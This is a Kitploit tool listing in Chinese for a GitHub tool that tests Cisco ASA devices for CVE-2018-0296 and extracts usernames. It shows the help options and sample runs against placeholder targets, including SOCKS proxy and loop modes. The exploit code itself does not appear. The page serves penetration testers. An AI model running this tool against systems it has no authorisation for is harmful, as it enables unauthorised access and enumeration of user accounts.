Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-0296 — Test CVE-2018-0296 and extract usernames | Kitploit
工具/GitHubGitHub/milo2012/cve-2018-0296
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubmilo2012/cve-2018-0296

CVE-2018-0296

Test CVE-2018-0296 and extract usernames

查看仓库
107347年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-0296

测试CVE-2018-0296并从Cisco ASA中提取用户名。

更多技术细节请参考 https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/。

#帮助菜单

root@kitploit:~
$ ./CVE-2018-0296  -h
选项:

  -h, --help   显示帮助信息
  -u, --url    目标设备的URL
  -i           Socks代理的IP
  -p           Socks代理的端口
  -t, --time   循环之间休眠的秒数
      --loop   循环模式

#使用指南

root@kitploit:~
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] 正在检查: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [存在漏洞]
[*] 找到的用户名
testuser1

$ ./CVE-2018-0296 -u https://www.yahoo.com:443
[*] 正在检查: https://www.yahoo.com
[+] https://www.yahoo.com [NOT Cisco VPN]

$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] 正在检查: https://x.x.x.x
[+] https://x.x.x.x [Cisco VPN]
[+] https://x.x.x.x [存在漏洞]
[*] 未找到用户名
  
$ ./CVE-2018-0296  -i 127.0.0.1 -p 10000 --loop 10 -u https://x.x.x.x:443
[*] 正在检查: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [存在漏洞]
[*] 找到的用户名
testuser1
下载工具